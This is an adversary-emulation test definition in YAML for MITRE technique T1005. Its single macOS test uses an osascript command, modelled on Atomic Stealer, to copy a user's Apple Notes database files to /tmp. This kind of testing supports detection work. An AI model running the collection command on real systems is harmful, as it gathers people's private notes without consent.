attack_technique: T1005
display_name: Data from Local System
atomic_tests:
- name: Copy Apple Notes database
  auto_generated_guid: 019a8de9-49b2-7670-9f84-b53bc00bddf1
  description: This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
  supported_platforms:
  - macos
  input_arguments:
    destination_path:
      description: Parameter for destination_path
      type: string
      default: /tmp
  executor:
    name: sh
    elevation_required: false
    command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end repeat' -e 'end tell'
